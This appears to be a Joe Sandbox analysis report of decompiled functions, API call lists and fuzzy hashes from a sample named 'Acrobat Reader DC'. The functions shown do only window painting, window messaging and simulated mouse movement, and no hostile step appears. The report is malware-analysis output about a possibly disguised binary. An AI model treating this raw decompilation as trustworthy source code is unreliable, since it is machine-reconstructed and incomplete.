                                  0x00451c52
                                  0x00451c52
                                  0x00451c52
                                  0x00451c59
                                  0x00451c5f
                                  0x00451c61
                                  0x00451c63
                                  0x00451c63
                                  0x00451c61
                                  0x00451c69
                                  0x00451c72
                                  0x00451c85
                                  0x00451c8d
                                  0x00451c95
                                  0x00451c95
                                  0x00451c98
                                  0x00451ca1
                                  0x00451ca7
                                  0x00451caa
                                  0x00451cb6
                                  0x00451cba
                                  0x00451cc0
                                  0x00451cc8
                                  0x00451cce
                                  0x00451cd3
                                  0x00451cd3
                                  0x00451ce5
                                  0x00451cea
                                  0x00451ced
                                  0x00451cfa
                                  0x00451cfa
                                  0x00451b7d

                                  APIs
                                  • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                  • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                  • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                  • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                  • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                  • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Variant$Copy$AllocClearErrorLastString
                                  • String ID:
                                  • API String ID: 960795272-0
                                  • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                  • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                  • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                  • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00447BA8 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 96%
                                  			E00447BA8(void* __fp0, intOrPtr _a4) {
				struct tagPAINTSTRUCT _v68;
				struct tagRECT _v84;
				struct tagPOINT _v92;
				struct HWND__** _v104;
				void* _v129;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t38;
				struct HWND__** _t45;
				struct HWND__* _t46;
				void* _t51;
				struct HWND__** _t55;
				struct HWND__* _t57;
				intOrPtr _t59;
				struct HDC__* _t73;
				struct HWND__* _t76;
				signed int _t78;
				void* _t80;
				void* _t91;

				_t91 = __fp0;
				_t80 = (_t78 & 0xfffffff8) - 0x5c;
				_t32 = E00430C09(_a4, 0x4a8630, _a4);
				_t59 =  *0x4a8690; // 0x0
				_t55 =  *( *(_t59 + _t32 * 4));
				_t76 = _t55[0x73];
				_v104 = _t55;
				_t73 = BeginPaint( *_t55,  &(_v84.right));
				while(_t76 != 0) {
					_t37 =  *(_t76 + 8);
					if(( *(_t37 + 0x8a) & 0x00000010) == 0 ||  *(_t37 + 0x8b) != 0xff) {
						if(( *(_t37 + 0x8b) & 0x000000ff) == _t55[0x65]) {
							goto L5;
						}
					} else {
						L5:
						_t38 = _t37 | 0xffffffff;
						 *0x4a86f4 = _t38;
						 *0x4a86f8 = _t38;
						 *0x4a86ec = 0;
						 *0x4a86e8 = 0;
						 *0x4a86e4 = 0;
						 *0x4a86f0 = 1;
						GetWindowRect( *( *(_t76 + 8)),  &_v84);
						_v92.x = _v84.left;
						_v92.y = _v84.top;
						ScreenToClient( *_t55,  &_v92);
						SetViewportOrgEx(_t73, _v92, _v92.y, 0);
						_t45 =  *(_t76 + 8);
						_t57 = _t45[0x11];
						_t46 = _t45[0x12];
						if(_t57 < 0) {
							L8:
							if(_t46 != 0xffffffff || _t57 >= 0) {
								goto L10;
							}
						} else {
							if(_t46 != 0xffffffff) {
								L10:
								E0044719B(_t73, _t46, _t57, 0, 1);
								Rectangle(_t73, 0, 0, ( *(_t76 + 8))[0x21], ( *(_t76 + 8))[0x21]);
								E0042FD29(_t73, _t57);
							} else {
								_t46 = _t57;
								goto L8;
							}
						}
						_t51 = E0044734F(_t91, _t73, _t76);
						E0044770D(_t73, _t73, _t76);
						if(_t51 != 0) {
							E004475CC(_t73, _t76, _t73, _t76);
						}
						_t55 =  *(_t80 + 0xc);
					}
					_t76 = _t76->i;
				}
				return EndPaint( *_t55,  &_v68);
			}
























                                  0x00447ba8
                                  0x00447bae
                                  0x00447bbd
                                  0x00447bc2
                                  0x00447bcb
                                  0x00447bcf
                                  0x00447bdb
                                  0x00447be5
                                  0x00447be9
                                  0x00447bf8
                                  0x00447c02
                                  0x00447c1a
                                  0x00000000
                                  0x00000000
                                  0x00447c20
                                  0x00447c20
                                  0x00447c20
                                  0x00447c23
                                  0x00447c28
                                  0x00447c2d
                                  0x00447c34
                                  0x00447c3e
                                  0x00447c48
                                  0x00447c5d
                                  0x00447c6f
                                  0x00447c77
                                  0x00447c7b
                                  0x00447c8e
                                  0x00447c94
                                  0x00447c97
                                  0x00447c9a
                                  0x00447c9f
                                  0x00447ca8
                                  0x00447cab
                                  0x00000000
                                  0x00000000
                                  0x00447ca1
                                  0x00447ca4
                                  0x00447cb1
                                  0x00447cb8
                                  0x00447cd5
                                  0x00447cdd
                                  0x00447ca6
                                  0x00447ca6
                                  0x00000000
                                  0x00447ca6
                                  0x00447ca4
                                  0x00447ce4
                                  0x00447ced
                                  0x00447cf4
                                  0x00447cf8
                                  0x00447cf8
                                  0x00447cfd
                                  0x00447cfd
                                  0x00447d01
                                  0x00447d03
                                  0x00447d1f

                                  APIs
                                  • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                  • GetWindowRect.USER32 ref: 00447C5D
                                  • ScreenToClient.USER32 ref: 00447C7B
                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                  • EndPaint.USER32(?,?), ref: 00447D13
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                  • String ID:
                                  • API String ID: 4189319755-0
                                  • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                  • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                  • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                  • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044900D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0044900D(void* __ecx, void* __eflags, signed int _a4, long _a8) {
				signed int _v8;
				signed int _t32;
				signed char _t39;
				intOrPtr _t44;
				intOrPtr _t49;
				struct HWND__* _t53;
				struct HWND__** _t58;

				if(E00441AF5(0x4a8630, _a4,  &_a4,  &_v8) == 0) {
					L16:
					return 0;
				} else {
					_t44 =  *0x4a8690; // 0x0
					_t49 =  *0x4a86a4; // 0xa71980
					_a4 =  *((intOrPtr*)( *((intOrPtr*)(_t44 + _a4 * 4))));
					_t58 =  *( *(_t49 + _v8 * 4));
					_t53 =  *_t58;
					_t39 = _t58[0x22];
					E00432B92( &_a8);
					_t32 = _t39 & 0x000000ff;
					if(_t32 > 0x1b) {
						goto L16;
					} else {
						_t13 = _t32 + 0x449159; // 0x0
						switch( *((intOrPtr*)(( *_t13 & 0x000000ff) * 4 +  &M0044913D))) {
							case 0:
								L8:
								__eax = _a4;
								 *((intOrPtr*)(__esi + 0x48)) = _a8;
								__eax = E00430B87(_a4, __esi, 1);
								goto L9;
							case 1:
								__ecx = _a8;
								__eax = SendMessageW(__edi, 0x409, 0, _a8);
								goto L9;
							case 2:
								__eax = SendMessageW(__edi, 0x111e, 0, _a8);
								goto L9;
							case 3:
								__ecx =  *(__esi + 0x30);
								__eax = _a8;
								 *((intOrPtr*)(__esi + 0x48)) = _a8;
								__eax = InvalidateRect( *(__esi + 0x30), 0, 1);
								goto L9;
							case 4:
								_t34 = SendMessageW(_t53, 0x1024, 0, _a8);
								L9:
								if( *0x49751c == 0 || _t39 != 8 && _t39 != 4 && _t39 != 0x1a && _t39 != 0x19) {
									return 1;
								} else {
									return _t34 | 0xffffffff;
								}
								goto L17;
							case 5:
								__eax = GetWindowLongW(__edi, 0xfffffff0);
								__eax = SetWindowLongW(__edi, 0xfffffff0, __eax);
								goto L8;
							case 6:
								goto L16;
						}
					}
				}
				L17:
			}










                                  0x0044902c
                                  0x00449130
                                  0x00449138
                                  0x00449032
                                  0x00449035
                                  0x00449043
                                  0x00449049
                                  0x0044904f
                                  0x00449051
                                  0x00449053
                                  0x0044905d
                                  0x00449062
                                  0x0044906b
                                  0x00000000
                                  0x00449071
                                  0x00449071
                                  0x00449078
                                  0x00000000
                                  0x004490e7
                                  0x004490e7
                                  0x004490f1
                                  0x004490f4
                                  0x00000000
                                  0x00000000
                                  0x00449093
                                  0x0044909f
                                  0x00000000
                                  0x00000000
                                  0x004490b3
                                  0x00000000
                                  0x00000000
                                  0x004490bb
                                  0x004490be
                                  0x004490c6
                                  0x004490c9
                                  0x00000000
                                  0x00000000
                                  0x0044908b
                                  0x004490f9
                                  0x00449100
                                  0x0044912d
                                  0x00449116
                                  0x0044911f
                                  0x0044911f
                                  0x00000000
                                  0x00000000
                                  0x004490d4
                                  0x004490e1
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00449078
                                  0x0044906b
                                  0x00000000

                                  APIs
                                  • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                  • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                  • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                  • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                  • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                  • SetWindowLongW.USER32 ref: 004490E1
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSend$LongWindow$InvalidateRect
                                  • String ID:
                                  • API String ID: 1976402638-0
                                  • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                  • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                  • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                  • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00440A0D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00440A0D(intOrPtr _a4, intOrPtr _a8, int _a12) {
				struct HWND__*** _t56;
				struct HWND__** _t57;
				struct HWND__** _t63;
				struct HWND__*** _t65;
				struct HWND__** _t66;
				struct HWND__** _t69;
				intOrPtr _t72;
				signed char _t80;
				signed int _t90;
				signed int _t91;
				intOrPtr _t92;

				_t72 = _a8;
				_t92 = _a4;
				_a8 =  *((intOrPtr*)(_t72 + 4));
				if( *(_t72 + 0x194) == _a12) {
					L14:
					_t90 = 3;
					if( *((intOrPtr*)(_t92 + 0x84)) < 3) {
						L25:
						return SendMessageW( *(_t72 + 0x18c), 0x130c, _a12, 0);
					} else {
						do {
							_t56 =  *( *((intOrPtr*)(_t92 + 0x74)) + _t90 * 4);
							if( *_t56 != 0) {
								_t57 =  *_t56;
								if(_t57[1] == _a8 && _t57[0x22] != 0xb && (_t57[0x22] & 0x000000ff) ==  *(_t72 + 0x194) && (_t57[0x22] & 0x00000020) == 0) {
									ShowWindow( *_t57, 0);
									ShowWindow( *( *( *( *((intOrPtr*)(_t92 + 0x74)) + _t90 * 4))), 4);
									_t63 =  *( *( *((intOrPtr*)(_t92 + 0x74)) + _t90 * 4));
									if((_t63[0x22] & 0x00000040) != 0 && _t63[0x22] == 0x1a) {
										EnableWindow( *_t63, 1);
									}
								}
							}
							_t90 = _t90 + 1;
						} while (_t90 <=  *((intOrPtr*)(_t92 + 0x84)));
						goto L25;
					}
				}
				_t91 = 3;
				if( *((intOrPtr*)(_t92 + 0x84)) < 3) {
					L13:
					 *(_t72 + 0x194) = _a12;
					goto L14;
				} else {
					goto L2;
				}
				do {
					L2:
					_t65 =  *( *((intOrPtr*)(_t92 + 0x74)) + _t91 * 4);
					if( *_t65 != 0) {
						_t66 =  *_t65;
						if(_t66[1] == _a8 && _t66[0x22] != 0xb) {
							_t80 = _t66[0x22];
							if((_t80 & 0x000000ff) ==  *(_t72 + 0x194) ||  *((char*)(_t72 + 0x19c)) != 0 && _t80 != 0xff && _t66[0x22] != 0xa) {
								ShowWindow( *_t66, 0);
								_t69 =  *( *( *((intOrPtr*)(_t92 + 0x74)) + _t91 * 4));
								if((_t69[0x22] & 0x00000040) != 0 && _t69[0x22] == 0x1a) {
									EnableWindow( *_t69, 0);
								}
							}
						}
					}
					_t91 = _t91 + 1;
				} while (_t91 <=  *((intOrPtr*)(_t92 + 0x84)));
				goto L13;
			}














                                  0x00440a11
                                  0x00440a1e
                                  0x00440a22
                                  0x00440a28
                                  0x00440ac7
                                  0x00440ac7
                                  0x00440ad2
                                  0x00440b63
                                  0x00440b7f
                                  0x00440ad8
                                  0x00440add
                                  0x00440ae0
                                  0x00440ae6
                                  0x00440ae8
                                  0x00440af0
                                  0x00440b18
                                  0x00440b2b
                                  0x00440b37
                                  0x00440b40
                                  0x00440b50
                                  0x00440b50
                                  0x00440b40
                                  0x00440af0
                                  0x00440b56
                                  0x00440b57
                                  0x00000000
                                  0x00440add
                                  0x00440ad2
                                  0x00440a2e
                                  0x00440a39
                                  0x00440abe
                                  0x00440ac1
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00440a3f
                                  0x00440a3f
                                  0x00440a42
                                  0x00440a48
                                  0x00440a4a
                                  0x00440a52
                                  0x00440a5d
                                  0x00440a6c
                                  0x00440a8a
                                  0x00440a96
                                  0x00440a9f
                                  0x00440aaf
                                  0x00440aaf
                                  0x00440a9f
                                  0x00440a6c
                                  0x00440a52
                                  0x00440ab5
                                  0x00440ab6
                                  0x00000000

                                  APIs
                                  • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                  • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                  • ShowWindow.USER32(?,00000000), ref: 00440B18
                                  • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                  • EnableWindow.USER32(?,00000001), ref: 00440B50
                                  • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Window$Show$Enable$MessageSend
                                  • String ID:
                                  • API String ID: 642888154-0
                                  • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                  • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                  • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                  • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00441FD6 Relevance: 9.1, APIs: 6, Instructions: 102COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 65%
                                  			E00441FD6(void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, long _a16, intOrPtr _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				struct tagRECT _v32;
				char _v36;
				long _v40;
				long _v44;
				intOrPtr _v48;
				signed int _t59;
				long _t68;
				long _t72;
				long _t91;
				long _t96;
				signed int _t98;
				void* _t100;
				void* _t101;

				_t105 = __fp0;
				_t100 = (_t98 & 0xfffffff8) - 0x2c;
				_t72 = _a16;
				E0043137E( *((intOrPtr*)(_a4 + 0x100)),  &_v36, GetForegroundWindow());
				GetWindowRect(GetDesktopWindow(),  &_v32);
				asm("cdq");
				_t96 = (_a8 + _v48 + 1 << 0x10) / _v32.right - 1;
				asm("cdq");
				_t59 = (_a12 + _v44 + 1 << 0x10) / _v32.bottom;
				_t91 = _t59 - 1;
				if(_t72 != 0) {
					if(__eflags <= 0) {
						L6:
						_t72 = 0xa;
						L7:
						GetCursorPos( &(_v32.top));
						asm("cdq");
						_v40 = _v32.top.x * 0xffff / (_v12 - 1) + 1;
						asm("cdq");
						_t68 = _v32.right * 0xffff / (_v8 - 1) + 1;
						__eflags = _t68;
						_v44 = _t68;
						while(1) {
							_t59 = E0043326F(_t96, _t91, _t72, 0x20,  &_v40,  &_v44);
							_t101 = _t100 + 0x18;
							__eflags = _t59;
							if(_t59 == 0) {
								break;
							}
							mouse_event(0x8001, _v40, _v44, 0, 0);
							_push(0xa);
							E004331A2(_t59, _t105);
							_t100 = _t101 + 4;
						}
						L3:
						return _t59;
					}
					__eflags = _t72 - 0x64;
					if(_t72 <= 0x64) {
						goto L7;
					}
					goto L6;
				}
				mouse_event(0x8001, _t96, _t91, _t72, _t72);
				if(_a20 != _t72) {
					_push(0xa);
					_t59 = E004331A2(_t59, __fp0);
				}
				goto L3;
			}


















                                  0x00441fd6
                                  0x00441fdc
                                  0x00441fe0
                                  0x00442001
                                  0x0044201a
                                  0x00442026
                                  0x0044202b
                                  0x00442034
                                  0x00442035
                                  0x00442039
                                  0x0044203e
                                  0x00442067
                                  0x0044206e
                                  0x0044206e
                                  0x00442073
                                  0x00442078
                                  0x0044208c
                                  0x0044209a
                                  0x004420a8
                                  0x004420ab
                                  0x004420ab
                                  0x004420ac
                                  0x004420b6
                                  0x004420c5
                                  0x004420ca
                                  0x004420cd
                                  0x004420cf
                                  0x00000000
                                  0x00000000
                                  0x004420e4
                                  0x004420ea
                                  0x004420ec
                                  0x004420f1
                                  0x004420f1
                                  0x0044205e
                                  0x00442064
                                  0x00442064
                                  0x00442069
                                  0x0044206c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0044206c
                                  0x00442049
                                  0x00442052
                                  0x00442054
                                  0x00442056
                                  0x0044205b
                                  0x00000000

                                  APIs
                                  • GetForegroundWindow.USER32 ref: 00441FEB
                                    • Part of subcall function 0043137E: GetWindowRect.USER32 ref: 00431399
                                  • GetDesktopWindow.USER32 ref: 00442013
                                  • GetWindowRect.USER32 ref: 0044201A
                                  • mouse_event.USER32 ref: 00442049
                                    • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                  • GetCursorPos.USER32(?,?,?), ref: 00442078
                                  • mouse_event.USER32 ref: 004420E4
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                  • String ID:
                                  • API String ID: 4137160315-0
                                  • Opcode ID: c5ebc6bffcea8891df72ff2766fe98ff5e780c8f2d9f97d85ba0139f445d3039
                                  • Instruction ID: 269498413448c1b0457bf7b9883effbdcf17ebc276120b60b0d95eb2daedcabf
                                  • Opcode Fuzzy Hash: c5ebc6bffcea8891df72ff2766fe98ff5e780c8f2d9f97d85ba0139f445d3039
                                  • Instruction Fuzzy Hash: FA31A372104306AFE710CF54CD85E6BB7E9FF98304F00092DF94597281E6B5EA05CBA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00441078 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 75%
                                  			E00441078(void* __ebx, void* __esi, long _a4, long _a8, signed int _a12) {
				signed int _t18;
				long _t21;
				signed int _t24;
				void* _t32;
				struct HWND__** _t33;
				intOrPtr _t36;
				long _t40;
				void* _t42;
				struct HWND__* _t43;

				_t42 = __esi;
				_t32 = __ebx;
				_t17 = _a12;
				_t40 = _a4;
				if(_a12 == 0) {
					_t18 =  *0x4a869c; // 0xffffffff
				} else {
					_t18 = E00430C09(_t17, 0x4a8630, _t17);
					 *0x4a869c = _t18;
				}
				if(_t18 != 0xffffffff) {
					_t36 =  *0x4a8690; // 0x0
					_push(_t32);
					_t33 =  *( *(_t36 + _t18 * 4));
					_push(_t42);
					_t43 =  *_t33;
					_a12 = 0 | (GetWindowLongW(_t43, 0xfffffff0) & 0x00c00000) == 0x00c00000;
					if(_t40 == 0xffffffff || SetWindowLongW(_t43, 0xfffffff0, _t40) != 0) {
						_t21 = _a8;
						if(_t21 == 0xffffffff || SetWindowLongW(_t43, 0xffffffec, _t21) != 0) {
							if(_t33[0xe] != 0) {
								_t24 = 0 | (_t40 & 0x00c00000) == 0x00c00000;
								if(_a12 != _t24) {
									_push(4);
									if(_t24 == 0) {
										_t33[0x12] = _t33[0x12] - GetSystemMetrics();
									} else {
										_t33[0x12] = _t33[0x12] + GetSystemMetrics();
									}
								}
								SetWindowPos(_t43, 0, 0, 0, 0, 0, 0x47);
							}
							return 1;
						} else {
							goto L6;
						}
					} else {
						L6:
						return 0;
					}
				} else {
					return 0;
				}
			}












                                  0x00441078
                                  0x00441078
                                  0x0044107b
                                  0x0044107f
                                  0x00441084
                                  0x00441150
                                  0x0044108a
                                  0x00441090
                                  0x00441095
                                  0x00441095
                                  0x00441158
                                  0x0044109f
                                  0x004410a8
                                  0x004410a9
                                  0x004410ab
                                  0x004410ac
                                  0x004410c6
                                  0x004410cc
                                  0x004410dc
                                  0x004410e2
                                  0x004410ff
                                  0x0044110f
                                  0x00441115
                                  0x00441117
                                  0x0044111b
                                  0x0044112e
                                  0x0044111d
                                  0x00441123
                                  0x00441123
                                  0x0044111b
                                  0x0044113e
                                  0x0044113e
                                  0x0044114d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004410f2
                                  0x004410f2
                                  0x004410f8
                                  0x004410f8
                                  0x0044115e
                                  0x00441162
                                  0x00441162

                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                  • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                  • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                  • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044389A Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0044389A(void* __ecx, void* __eflags, struct HDC__* _a4, intOrPtr _a8, signed int _a12) {
				long _v12;
				char _v20;
				void* __edi;
				void* _t23;
				int _t29;
				long _t31;
				void* _t33;
				signed int _t34;
				void* _t35;
				char _t39;
				WCHAR* _t40;
				struct tagSIZE* _t41;
				void* _t42;
				void* _t43;
				void* _t44;
				void* _t45;

				_t46 = __eflags;
				_t35 = __ecx;
				_t41 = _a12;
				E0043652F(_t46,  &_v20, E00410160(_a8, __eflags));
				_t39 = _v20;
				_t34 = 0;
				_t41->cy = 0;
				_t41->cx = 0;
				_v12 = 0;
				_a12 = 1;
				_t23 = E004111C1(_t39);
				_t43 = _t42 + 4;
				if(_t23 != 0) {
					do {
						if( *((short*)(_t39 + _t34 * 2)) == 0xa) {
							_a12 = _a12 + 1;
						}
						_t34 = _t34 + 1;
						_t33 = E004111C1(_t39);
						_t43 = _t43 + 4;
						_t50 = _t34 - _t33;
